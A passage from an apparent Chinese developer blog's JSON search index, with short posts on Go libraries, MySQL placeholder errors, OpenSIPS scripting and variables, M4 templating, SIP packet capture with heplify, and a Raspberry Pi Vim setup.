https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go\n","permalink":"https://wdd.js.org/golang/my-start-repo/","summary":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 https://github.com/pkg/errors 结构体转二进制 https://github.com/lunixbochs/struc VIM智能补全提示 需要安装coc-go, 还有vim-go","title":"我常用的第三方库"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. 
Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/golang/mysql-placeholder/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholder https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能如实按照用户的按键来输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不会一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;替换成一个中文破折号 
以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期再复制出来用时,必然出现问题。\n我问了官方的客服,官方的客服也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,智能破折号,智能链接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。\n","permalink":"https://wdd.js.org/posts/2021/10/","summary":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能如实按照用户的按键来输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不会一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;替换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期再复制出来用时,必然出现问题。\n我问了官方的客服,官方的客服也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,智能破折号,智能链接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。","title":"印象笔记不太智能的智能替换"},{"content":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","permalink":"https://wdd.js.org/opensips/ch5/avp-db-query/","summary":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","title":"avp_db_query数值null值比较"},{"content":"文本处理的难点 有一个文本文件,摘抄其中两行内容如下,里面有db_addr, local_ip这两个配置,需要在不同环境中修改。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 
用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 用define语句定义宏 用define()语句来定义宏 用`\u0026lsquo;来作为字符串引用,避免被展开 define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行命令m4 1.m4, 可以看到宏展开,但是有很多空行。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ...% 用dnl避免产生空行 在define语句的末尾,加上dnl\ndefine(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;)dnl define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;)dnl define(`MAX_LEN\u0026#39;, `2048\u0026#39;)dnl db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行m4 1.m4 可以看到,空行没了\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 抽离出宏配置文件 将1.m4分成两个文件1.m4, 1.conf\n1.conf\ndivert(-1) define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) divert(0) 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行:m4 1.conf 1.m4\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 
读取环境变量 define(`MY_NAME\u0026#39;, `esyscmd(`printf \u0026#34;${MY_NAME:-wdd}\u0026#34;\u0026#39;)\u0026#39;)dnl ","permalink":"https://wdd.js.org/posts/2021/09/","summary":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... 
if 1 = 2048 { .","title":"简单实用的M4教程"},{"content":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0\n","permalink":"https://wdd.js.org/opensips/ch7/sendmsg-failed/","summary":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0","title":"sendmsg failed on 0: Socket operation on non-socket"},{"content":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中,正常来说,ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能把BYE消息直接发送给ua2, 但是一般ua1和ua2之间是存在nat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求根据某个响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua1后收到notify的200ok, 此时ua1获取的ua2的地址就是ua2 所以问题的表现可能是偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","permalink":"https://wdd.js.org/opensips/ch7/escape-msg/","summary":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中,正常来说,ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能把BYE消息直接发送给ua2, 但是一般ua1和ua2之间是存在nat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求根据某个响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 
但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua1后收到notify的200ok, 此时ua1获取的ua2的地址就是ua2 所以问题的表现可能是偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","title":"信令路径逃逸分析"},{"content":"heplify是个独立的抓包程序,类似于tcpdump之类的网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进制程序。二进制程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的路径 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","permalink":"https://wdd.js.org/opensips/tools/heplify/","summary":"heplify是个独立的抓包程序,类似于tcpdump之类的网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hepserver负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进制程序。二进制程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的路径 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","title":"heplify SIP信令抓包客户端"},{"content":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{transformation}) 除了name以外,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, 
DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上. avp变量可以有多个值 可以avp变量理解成一个后进先出的栈 所有处理这个消息的子路由都可以获得avp的变量。但是如果想在响应路由中想获取请求路由中的avp变量,则需要设置TM模块的onreply_avp_mode参数:modparam(\u0026quot;tm\u0026quot;,\u0026quot;onreply_avp_mode\u0026quot;, 1) $avp(trunk)=\u0026#34;hello\u0026#34;; $avp(trunk)=\u0026#34;duan\u0026#34;; $avp(trunk)=\u0026#34;hi\u0026#34;; # 可以把trunk的值理解成下面的样子 # hi -\u0026gt; duan -\u0026gt; hello xlog(\u0026#34;$avp(trunk)\u0026#34;); 这里只能打印出hi xlog(\u0026#34;$(avp(trunk)[2])\u0026#34;); 这里能打印hello $avp(trunk)=NULL; 这里能删除最后的一个值,如果只有一个值,那么整个avp会被删除 avp_delete(\u0026#34;$avp(trunk)/g\u0026#34;); # 删除avp所有的值,包括这个avp自身。 $(avp(trunk)[1])=\u0026#34;heihei\u0026#34;; 重新赋值 $(avp(trunk)[1])=NULL; 删除某一个值 伪变量 伪变量主要是对SIP消息的各个部分进行引用的\n大部分伪变量很好接,都是缩写的单词的首字母。\n伪变量以$开头,加sip消息字段的缩写,例如$ci, 代表sip callID 序号 名称 是否可修改 含义 1 $ai 引用P-Asserted-Identify头的url 2 $adu Authentication Digest URI 3 $ar Authentication realm 4 $au Auth username user 5 $ad Auth username domain 6 $an Auth nonce 7 $auth.resp Auth response 8 $auth.nonce Auth nonce 9 $auth.opaque the opaque 字符串 10 $auth.alg 认证算法 11 $auth.qop 
qop参数的值 12 $auth.nc nonce count参数 13 $aU 整个username 14 $Au 计费用的账户名,主要是acc会用 15 $argv 获取通过命令行参数设置参数-o。例如在启动opensips时```bash opensips -o maxsiplength=1200 \u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;在脚本里就可以通过$argv(maxsiplength)\u0026lt;br /\u0026gt;```bash xlog(\u0026#34;maxsiplength: is $argv(maxsiplength)\u0026#34;) | | 16 | $af | | ip协议,可能是INET(ipv4), 或者是INET6(ipv6) | | 17 | $branch | | 用来创建新的分支```bash $branch=\u0026ldquo;sip:new#domain\u0026rdquo;;\n| | 18 | $branch() | | \u0026lt;br /\u0026gt;- $branch(uri)\u0026lt;br /\u0026gt;- $branch(duri)\u0026lt;br /\u0026gt;- $branch(q)\u0026lt;br /\u0026gt;- $branch(path)\u0026lt;br /\u0026gt;- $branch(flags)\u0026lt;br /\u0026gt;- $branch(socket)\u0026lt;br /\u0026gt; | | 19 | **$ci** | | 引用sip call-id。 (call-id) | | 20 | **$cl** | | 引用sip body部分的长度。(content-length) | | 21 | $cs | | 引用 cseq number | | 22 | $ct | | 引用Contact\u0026lt;br /\u0026gt;- $ci\u0026lt;br /\u0026gt;- $(ct[n])\u0026lt;br /\u0026gt;- $(ct[-n])\u0026lt;br /\u0026gt; | | 23 | $ct.fields() | \u0026lt;br /\u0026gt; | \u0026lt;br /\u0026gt;- $ct.fields(name)\u0026lt;br /\u0026gt;- $ct.fields(uri)\u0026lt;br /\u0026gt;- $ct.fields(q)\u0026lt;br /\u0026gt;- $ct.fields(expires)\u0026lt;br /\u0026gt;- $ct.fields(methods)\u0026lt;br /\u0026gt;- $ct.fields(received)\u0026lt;br /\u0026gt;- $ct.fields(params) 所有的参数\u0026lt;br /\u0026gt; | | 24 | $cT | | \u0026lt;br /\u0026gt;- $cT Content-Type\u0026lt;br /\u0026gt;- $(cT[n])\u0026lt;br /\u0026gt;- $(cT[-n])\u0026lt;br /\u0026gt;- $(cT[*])\u0026lt;br /\u0026gt; | | 25 | **$dd** | | 引用目标url里面的domain部分 | | 26 | $di | | diversion header | | 27 | $dip | | diversion privacy prameter | | 29 | $dir | | diversion reason parameter | | 30 | $dp | | 目标url的端口号部分 (destionation port) | | 31 | $dP | | 目标url的传输协议部分 (destionation protocol) | | 32 | $ds | | destionation set | | 33 | **$du** | | 引用 destionation url | | 34 | $err.class | | 错误的类别\u0026lt;br /\u0026gt;- 1 解析错误\u0026lt;br /\u0026gt; | | 35 | $err.level | | 错误的级别 | | 36 
| $err.info | | 错误信息的描述 | | 37 | $err.rcode | | error reply code | | 38 | $err.rreason | | error reply reason | | 39 | **$fd** | | From URI domain | | 40 | **$fn** | | From display name | | 41 | **$fs** | | 强制使用某个地址发送消息。 (forced socket)\u0026lt;br /\u0026gt;格式:proto:ip:port | | 42 | $ft | | From tag | | 43 | **$fu** | | From URL | | 44 | **$fU** | | username in From URL | | 45 | **$log_level** | | 可以用来动态修改日志级别\u0026lt;br /\u0026gt;$log_level=4;\u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;$log_level=NULL; 恢复默认值 | | 46 | $mb | | sip message buffer | | 47 | $mf | | message flags | | 48 | $mi | | sip message id | | 49 | **$ml** | | sip message length | | 50 | $od | | domain in original R-URI | | 51 | $op | | port in original R-URI | | 52 | $oP | | transport protocol of original R-URI | | 53 | $ou | | original URI | | 54 | $oU | | username in original URI | | 55 | **$param(idx)** | | 引用路由参数,从1开始\u0026lt;br /\u0026gt;```bash route{ route(R_NAME, $var(debug), \u0026#34;pp\u0026#34;); } route[R_NAME]{ $param(1); #引用第一个参数 $var(debug) $param(2); #引用第二个参数 pp } | | 56 | $pd | | domain in sip P-Prefered-Identify header | | 57 | $pn | | display name in sip P-Prefered-Identify header | | 58 | $pp | | process id | | 59 | $pr $proto | | 接受消息的协议 UDP, TCP, TLS, SCTP, WS | | 60 | $pu | | URL in sip P-Prefered-Identify header | | 61 | $rd | | domain in request url | | 62 | $rb | | body of request/replay- $rb- $(rb[*])- $(rb[n])- $(rb[-n])- $rb(application/sdp)- $rb(application/isup) | | 63 | $rc $retcode | | 上个函数的返回结果 | | 64 | $re | | remote-party-id | | 65 | $rm | | sip method | | 66 | $rp | | port of R-RUI | | 67 | $rP | | transport protocol pf R-URI | | 68 | $rr | | reply reason | | 69 | $rs | | reply status | | 70 | $ru | | request url | | 71 | $rU | | | | 72 | $ru_q | | | | 73 | $Ri | | | | 74 | $Rp | | | | 75 | $sf | | | | 76 | $si | | | | 77 | $sp | | | | 78 | $tt | | | | 79 | $tu | | | | 80 | $tU | | | | 81 | $time(format) | | | | 82 | $T_branch_idx | | | | 83 | $Tf | | | | 84 | 
$Ts | | | | 85 | $Tsm | | | | 86 | $TS | | | | 87 | $ua | | | | 88 | $(hdr(name)[N]) | | | | 89 | $rT | | | | 90 | $cfg_line $cfg_file | | | | 91 | $xlog_level | | |\n","permalink":"https://wdd.js.org/opensips/ch5/core-var-2/","summary":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上.","title":"核心变量解读-100%"},{"content":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 
但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug 